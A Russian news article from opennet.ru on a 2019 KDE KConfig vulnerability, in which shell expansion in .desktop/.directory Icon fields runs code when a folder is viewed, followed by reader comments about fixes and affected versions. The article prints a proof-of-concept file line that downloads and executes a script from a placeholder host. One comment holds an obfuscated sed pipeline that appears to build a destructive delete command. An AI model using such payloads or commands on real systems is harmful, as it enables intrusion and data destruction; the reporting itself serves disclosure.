Уязвимость в KDE, позволяющая выполнить код при просмотре списка файлов

07.08.2019 12:25

В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функцию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды. Вопреки требованиям спецификации XDG выполнение раскрытия shell-конструкций производится без разделения типа настроек, т.е. не только при определении командной строки запускаемого приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory" вида:



   [Desktop Entry]
   Type=Directory
   Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin будет загружен и выполнен скрипт https://example.com/FILENAME.sh.

Дополнение: Разработчики KDE подготовили патч с исправлением, который удаляет поддержку раскрытия Shell-блоков "$(...)" в директивах, применяемых в файлах ".desktop" и ".directory", за исключением строк "Exec". Исправление будет включено в состав выпуска библиотеки kconfig 5.61.0, который в настоящее время находится на стадии кандидата в релизы.

исправить +26 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/51235-kde

Ключевые слова: kde

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (100)

1.1, Аноним (1), 12:31, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+18 +/–
Это даже не autorun виндовый, это вообще дырень. Однако не все пользуются kde-шным файловым менеджером и вообще kde.

2.6, Qwerty (??), 12:35, 07/08/2019 [^] [^^] [^^^] [ответить]	+17 +/–
Это даже не толстенький троллинг, это вообще жирень.

2.11, Аноним (11), 12:51, 07/08/2019 [^] [^^] [^^^] [ответить]	+4 +/–
>Это даже не autorun виндовый ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

3.67, VINRARUS (ok), 16:38, 07/08/2019 [^] [^^] [^^^] [ответить]

–1 +/–

>>Это даже не autorun виндовый
> ну почему. Теперь это еще и autorun, еще ближе к захвату десктопов

superautorun

2.13, Вуыкло (?), 12:54, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
От безысходности, ибо больше пользоваться попросту нечем.

2.20, анон (?), 13:09, 07/08/2019 [^] [^^] [^^^] [ответить]	+9 +/–
kde можно поставить на винду получим двойной профит

2.110, оралр (?), 11:32, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Это говорит о том, что никто даже не думал что эти кеды и кому-то понадобиться взламывать, а следовательно и защищать. Зато пафосные сравнения с вантузом, который 20 лет сопротивляется реальным попыткам взлома.

3.111, анон (?), 12:22, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
> 20 лет сопротивляется реальным попыткам взлома китайские_пионеры.jpg

1.2, Голубой гигант (?), 12:32, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
KDE 3.5.10 из openSUSE 15.1 подвержен?

2.4, Аноним (4), 12:33, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Да

2.124, otmuenbg (?), 20:01, 09/08/2019 [^] [^^] [^^^] [ответить]	+/–
так проверь там вроде просто для матерого кадешника

2.126, sunjob (ok), 19:01, 10/08/2019 [^] [^^] [^^^] [ответить]	+/–
подвержены,да, но - пролечено мгновенно в TDE, после поступления сигнала - лечится аналогично в старом KDE3 (видимо, вообще бибилотеку не изменяли с тех пор ... а че?! работает - не трогай :o) kdecore/kconfigbase.cpp https://mirror.git.trinitydesktop.org/gitea/TDE/tdelibs/pulls/46/files

1.3, Аноним (3), 12:33, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
> достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере в каком? midnight commander? pcmanfm? thunar?

2.7, kamagan (?), 12:39, 07/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
Видимо Dolphin, Krusader и Ark

2.35, Аноним (35), 14:18, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
В любом KDE-шном диалоге открытия файла.

3.92, Daemon (??), 22:43, 07/08/2019 [^] [^^] [^^^] [ответить]	–4 +/–
Я предполагаю, что это ошибка не KDE. А Qt в целом.

4.103, soarin (ok), 08:17, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Неверно предполагаешь. Баг именно в KDE, а не в Qt.

1.5, Аноним (5), 12:34, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+5 +/–
Виндовенько.

2.8, soarin (ok), 12:46, 07/08/2019 [^] [^^] [^^^] [ответить]	+2 +/–
Когда это в венде такой примитив был? Или вот ещё из той же серии. https://kde.org/info/security/advisory-20180208-2.txt В вендах разве что конкретно упоролись с автозагрузкой. Когда включили её по умолчанию. Но это была фишка, которую специально сделали, хоть и <я даже не знаю как цензурно это назвать>. С выходом Vista (уже более десяти лет прошло) дошло, что это была плохая идея.

3.49, Аноним (5), 16:07, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Было пару похожих уязвимостей с ярлыками.

4.87, Sinot (ok), 20:49, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Вроде в Gnome было подобное с превью картинок.

5.100, Аноним (100), 07:35, 08/08/2019 [^] [^^] [^^^] [ответить]	+4 +/–
Тсс... Не мешай гномерам ликовать.

6.104, soarin (ok), 08:21, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Пролистал комменты, что-то как-то не видно ликования гномеров. Фантазии? А так ничего удивительного в сабже. Ну и в GNOME само собой разные уязвимости были. И по авторанам, и по всяким превьюшкам. Это тоже естественно, ибо заинтересованность в нём выше.

7.115, нех (?), 15:07, 08/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
все просто. гномеры вымерли, ликовать некому.

4.105, soarin (ok), 08:29, 08/08/2019 [^] [^^] [^^^] [ответить]

+/–

Да было.
Я о другом - о простоте.

Ну вот почитай это. И где-то с 2010 в Windows чего-то было тоже.
Но везде как-то там серьёзно репу чесали, чтобы буфера так-сяк определёнными байтами переполнять.
https://scarybeastsecurity.blogspot.com/2016/11/0day-exploit-compromising-linu

А тут просто данные в SHELL суёт код, ну и ладно...

1.9, Аноним (9), 12:46, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Прям пыхом пахнуло. В 2019 году экранирование это всё ещё сложно?

2.12, НяшМяш (ok), 12:53, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Конечно. В Qt этой функции, наверное, нет из-за сложности реализации. /sarcasm

3.22, Аноним (22), 13:17, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Просто у них нет npm.

3.101, Аноним (100), 07:36, 08/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
А в гнгме ее просто нет. Как и многого другого.

1.10, Аноним (10), 12:50, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+2 +/–
пификсили вчера еще (в неоне), чел етот редиска канеш, но дырень огромная просто

2.47, Аноним (35), 16:01, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Интересно, где? https://packaging.neon.kde.org/?s=idle

3.83, anonymous (??), 18:58, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
да, сорян, прост вчера аккурат после новости апдейты секурные какие-то прилетели, толком не смотрел что именно, вот и подумалось, что топик-релейтед

4.125, anonymous (??), 21:52, 09/08/2019 [^] [^^] [^^^] [ответить]	+/–
а ващет я все-таки был прав: https://twitter.com/kdecommunity/status/1159224511499309056 от 7го числа еще пост

1.14, Аноним (-), 12:55, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
ls уязвим? Нет? Ну и ладно.

2.61, VINRARUS (ok), 16:27, 07/08/2019 [^] [^^] [^^^] [ответить]	–2 +/–
ls /bin \| sed -e '/.ee$/!d' -e '/^.r../!d' -e 's%e%f%' -e 's%$%*%' -e 's%^%r%' -e 's%e% /%' -e 's%f%m -%'

3.93, neAnonim (?), 22:46, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Так уязвим или чё? Ты вывод ls в sed отправляешь по своему желанию используя заклинание которое я рассмотреть не могу (не говоря уже о том что бы я это смог вбить)

1.15, anan (?), 12:58, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Минимум 11 лет багу

2.19, Аноним (19), 13:06, 07/08/2019 [^] [^^] [^^^] [ответить]	+3 +/–
И ведь кто-то наверняка знал!

2.48, Аноним (48), 16:05, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Ещё в konqueror была, когда он в KDE использовался, по-моему так и не пофиксили до перехода на Dolphin

3.85, Аноним (85), 19:07, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Тот кто пропатчил под неё KDE

1.24, IronMan (?), 13:18, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
В Тринити будут исправлять?

2.127, sunjob (ok), 19:06, 10/08/2019 [^] [^^] [^^^] [ответить]	+/–
> В Тринити будут исправлять? http://www.opennet.ru/openforum/vsluhforumID3/118081.html#126

1.25, Аноним (22), 13:19, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия.

2.44, iPony129412 (?), 15:34, 07/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
Ну это неправда. Секурные бэкпорты же есть.

3.52, Аноним (22), 16:14, 07/08/2019 [^] [^^] [^^^] [ответить]	–2 +/–
Особенно в дебиане. Нет там ничего.

4.58, soarin (ok), 16:23, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
ну это ложь https://security-tracker.debian.org/tracker/CVE-2018-6791 Вот как "не была" никогда залатана прошлая крутая дырка в KDE. Да, там проще было латать, но всё же.

5.90, Аноним (90), 21:52, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Все таки в дебиане и правда могут забить на это.

6.98, soarin (ok), 04:28, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Да, да, а ещё завтра Debian может закрыться. Возможно всё. И естественно, что KDE в Debian пониже приоритетом. Но всё же думать, что не наложат крохотный патч в "3 files changed, 7 insertions, 51 deletions" для высокого уровня опасной уязвимости глуповато.

2.66, soarin (ok), 16:35, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
> Самое забавное что в каком нибудь лтс кубунте этот баг никогда не исправят и там всегда будет старая багованая версия. А вот собственно залатка в апстриме https://phabricator.kde.org/D22979 Как видно - ничего особенно сложного. Так что залатают.

1.29, Аноним (29), 13:28, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]

–4 +/–

>Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Это что за статья????????

-Просто запустил KDE дистр, "перетащил мышью ярлык на рабочий стол или в документ" и получил заражение???

-Загрузил вредоносный desktop-файл от куда??? Вышел в интернет и загрузился сам???

2.63, VINRARUS (ok), 16:32, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.

3.82, Аноним (82), 18:48, 07/08/2019 [^] [^^] [^^^] [ответить]

–1 +/–

>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.

Вы статью читали? Где там про вирус на винде?

>В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ.

Где тут о винде?

>Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory"

Каким нужно быть, чтобы принять файл и не проверить его?

4.84, VINRARUS (ok), 19:02, 07/08/2019 [^] [^^] [^^^] [ответить]

–1 +/–

>>Например вирус на винде на диск кучек наклал, а KDE потом в них вступило.
>Вы статью читали? Где там про вирус на винде?

А долго его написать? =D
Я писал о случаях когда накопитель исполюзует по очерёдно и винда и ОС с KDE, и это не токо флешки.

>Каким нужно быть, чтобы принять файл и не проверить его?

Очень занятым человеком. :)

4.94, neAnonim (?), 22:51, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
> Каким нужно быть, чтобы принять файл и не проверить его? Достаточно быть пользователем kde и установить пакет который принесет с собой .desktop

2.89, Аноним (90), 21:51, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Пришел к тебе человек с уже зараженной флешкой (например в винде или спецом кто постарался), ты ее открыл - радуешься.

1.30, Ilya Indigo (ok), 13:35, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–3 +/–
Неприятная фича. К счастью, директории браузер загружать не умеет и прийти такое может только из архива, а Arc-ом открывать архивы безопасно. Ещё, конечно, из git-а такое может прийти...

2.60, Аноним (60), 16:27, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Я не знаю есть ли в Плазме Konqueror, но его фишка что это интернет браузер и файловый менеджер в одном флаконе.

3.68, Ilya Indigo (ok), 16:41, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
> Я не знаю есть ли в Плазме Konqueror, но его фишка что > это интернет браузер и файловый менеджер в одном флаконе. Есть. Файловый менеджер и браузер - это одно и тоже! Многие путают интернет браузер и браузер, а это разные вещи.

4.91, Аноним (60), 22:13, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
>Многие путают интернет браузер и браузер, а это разные вещи. Я знаю веб-браузер, а что за браузер в данном контексте?

5.96, Ilya Indigo (ok), 22:59, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
>>Многие путают интернет браузер и браузер, а это разные вещи. > Я знаю веб-браузер, а что за браузер в данном контексте? https://en.wikipedia.org/wiki/Browser Похоже я и сам ошибался, браузеров (обозревателей) множество, среди них web browser и file browser, also known as a file manager.

6.97, Аноним (60), 23:56, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Для избежания путаницы следует употреблять: веб-обозреватель (ВО) и файловый менеджер (ФМ). https://ru.wikipedia.org/wiki/Браузер https://ru.wikipedia.org/wiki/Файловый_менеджер

2.65, VINRARUS (ok), 16:33, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Покласть в архив с какими то кистями для фоторедактора - разархивировал и заразился.

3.72, Ilya Indigo (ok), 16:52, 07/08/2019 [^] [^^] [^^^] [ответить]	–2 +/–
Ну это и есть получить из архива Но Ваш алгоритм не совсем точен Получить архи... большой текст свёрнут, показать

4.102, Аноним (100), 07:43, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Чтобы распаковывать архивы, не заглядывая в них, нужно вообще быть альтернативно одаренной личностью.

5.109, VINRARUS (ok), 08:58, 08/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
Ну удачи в заглядывании в tar.gz без распаковки...

6.114, Аноним (114), 12:50, 08/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
Новость не читай @ Сразу пиши. Чтобы это сработало, архив нужно открыть как папку в долфине. По умолчанию эта возможность отключена в настройках, и весь просмотр осуществляется через Ark, который показывает содержимое, но не запускает выполнение .desktop-файлов.

1.31, AVX (ok), 13:45, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Вот же ппц... никогда бы не подумал что так можно обрабатывать путь к картинке... Надо дома протестировать как оно в реальности.

2.88, AVX (ok), 21:19, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Посмотрел - по умолчанию dolphin открывает архивы в архиваторе. Но в настройках есть снятая галочка "открывать архивы как папки". Остаётся только смотреть, что распаковываешь, а распаковывать по ПКМ.

1.32, Аноним (29), 14:01, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Кто-нибудь пользуется VMware ESX?

2.42, Аноним (42), 14:57, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Не ставятся на него кеды.

1.33, Аноним (33), 14:04, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
подвержены все у кого установлен файловый менеджер Dolphin?

2.38, вейланд (?), 14:22, 07/08/2019 [^] [^^] [^^^] [ответить]	+1 +/–
Любой файловый менеджер на базе kde, а также, если используются kde-шные диалоги открытия/сохранения файлов.

1.40, Аноним (40), 14:39, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Ну хоть скрипт выполнится из под юзера, не то что гномовоский наутилус, который давал рутовские права. Хотя безрукость конечно на лицо.

2.41, soarin (ok), 14:48, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
> не то что гномовоский наутилус, который давал рутовские права Что-то не припомню... А что, где, когда?

3.46, Аноним (40), 15:44, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
https://www.opennet.ru/opennews/art.shtml?num=49871

4.50, soarin (ok), 16:07, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
> В представленном 3 года назад GVFS-бекенде admin (GNOME Virtual File System) обнаружена уязвимость, позволяющая непривилегированным пользователям, присутствующим в группе wheel, без запроса пароля вносить любые правки в файловую систему с правами root. Да как-то сабж пострашнее будет.

2.45, Аноним (45), 15:34, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Че сказать-то хотел?

3.54, Аноним (22), 16:17, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Что ГНОМ говно. Но тебе виндузятнику такие слова знать не нужно и вообще мозговую активность проявлять не нужно.

4.62, Аноним (60), 16:28, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
Gnome здарового человека это MATE. KDE здарового человека это TDE.

5.73, Аноне (?), 16:55, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Гноме курильщика после операции это Гноме.

1.53, Аноним (53), 16:16, 07/08/2019 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ] [к модератору]	–1 +/–

1.69, VINRARUS (ok), 16:44, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
То я думаю чо Дельфин так долго запускается, а это его совесть мучит...

2.77, Аноним (77), 17:27, 07/08/2019 [^] [^^] [^^^] [ответить]	+/–
Долго запускается? Это на каком древнейшем железе? Специально замерил - на моём старом ThinkPad'e Dolphin запускается чуть больше секунды (1.3). На более современных компах будет ещё быстрее.

3.81, VINRARUS (ok), 18:28, 07/08/2019 [^] [^^] [^^^] [ответить]	–1 +/–
FX-8350 4.8 GHz, 16 Gb DDR3 2100 MHz, SSD Crucial MX500. 1+ сек запускается, шо много для ФМ, так как Firefox повторно запускается тоже меньше 2х сек. А иногда вообще бывают случаи по 5 сек.

4.117, InuYasha (?), 21:22, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
отключи всякие фуфлоиндексаторы - и будет скорость.

5.119, VINRARUS (ok), 21:44, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
> отключи всякие фуфлоиндексаторы - и будет скорость. Это ж какие?

6.120, InuYasha (?), 23:37, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Как минимум - baloo, вроде бы. Смотришь фоновые процессы, читаешь маны, что это такое и гасишь, если лишнее. Я удалил всё подобное при установке ОС на ноут несколько лет назад и с тех пор не вспоминал. А ноут весьма... экономичный %) Но вообще Dolphin и у меня стартует до 5 секунд. Но там ещё влияют всякие шАры, маунты и прочее. И превьюхи, само собой.

7.122, VINRARUS (ok), 00:50, 09/08/2019 [^] [^^] [^^^] [ответить]

+/–

> Как минимум - baloo, вроде бы.

Да его я уже даже и не помню когда отключил.

> шАры, маунты и прочее. И превьюхи, само собой.

Превьюхи никак не влияют, я проверил, потомушо обновляются уже после появления окна.
> Но вообще Dolphin и у меня стартует до 5 секунд.

Вот в этом и проблема же, а ты всё "руки помой и будет скорость" ;)

3.121, AlexYeCu_not_logged (?), 00:20, 09/08/2019 [^] [^^] [^^^] [ответить]	+/–
>Долго запускается? Это на каком древнейшем железе? На любом. Там что-то навертели в последних релизах, так он даже с ssd может сартовать секунд 8 или 9. Причём не всегда, а после некоторого простоя: после долгого запуска гачинает опять почти мгновенно стартовать. Не запускать некоторое время — может опять длинный запуск быть, а может и не быть. Даже при уже запущенной копии может долгий запуск быть. С чем связано — никто не знает. Сетевые каталоги другую картину дают обычно — запускается сразу, но может «тупить», если они не доступны. Многие пользователи грешили на настройки самбы, но нет. Очищение всевозможных кэшей тоже эффект не дало. В консоли только безуспешные поиски каталога tags:, причём при любом запуске, хоть быстром, хоть медленном. Индексеры и так всегда отключены. Загадка, в общем. Не начни разраб Nemo косплеить аутиста — свалил бы с Dolphin-а.

1.76, Аноним (76), 17:21, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Переходите на QubesOS и не парьтесь

2.107, Dmitry77 (ok), 08:31, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
А там этого бага нет?

1.80, Аноним (80), 18:23, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
с почином

1.86, Анонимно (?), 20:26, 07/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	–3 +/–
Линукс безопасен, говорили они...

2.95, neAnonim (?), 22:55, 07/08/2019 [^] [^^] [^^^] [ответить]	–4 +/–
А потом пришли шифровальщики, .rhost, выполнения кода при взгляде на иконку... популярность пришла. (Когда пользователи начнут еще и платить в стим, а не просто ставить, тогда начнется )

2.99, anonymous (??), 07:15, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Да вроде бы только ленивый не говорил, что userspace-комбайны -- это бажно и небезопасно.

3.116, Аноним 80_уровня (ok), 15:58, 08/08/2019 [^] [^^] [^^^] [ответить]	+/–
Где-то нахмурился один Лёня.

1.106, Dmitry77 (ok), 08:31, 08/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Интересно кто является коммитером этого бага?

1.112, Аноним (112), 12:26, 08/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
CVE-2019-14744

1.113, Георгий (??), 12:28, 08/08/2019 [ответить] [﹢﹢﹢] [ · · · ]

+/–

Исправлено
https://cgit.kde.org/kconfig.git/commit/?id=5d3e71b1d2ecd2cb2f910036e614ffdfc8

В версии kconfig 5.61.
https://kde.org/info/security/advisory-20190807-1.txt

Сейчас в KDE Neon еще 5.60. Не знаю, есть ли там этот патч в текущей сборке.

1.118, InuYasha (?), 21:26, 08/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Вот к чему приводит тяга к копанию в контенте вместо его отображения! А вы удивляетесь, почему современные фэйл-менеджеры такие торомзные! Отрубить нахрен все превьюхи. Хотя, конечно, даже в имени файла может закрасться эксплоит (по-моему, такое было в макоси или подобном).

1.123, Аноним (123), 12:26, 09/08/2019 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Давайте попробуем разобраться без злорадства Эта проблема не частный случай кас... большой текст свёрнут, показать

игнорирование участников | лог модерирования

Добавить комментарий

Текст: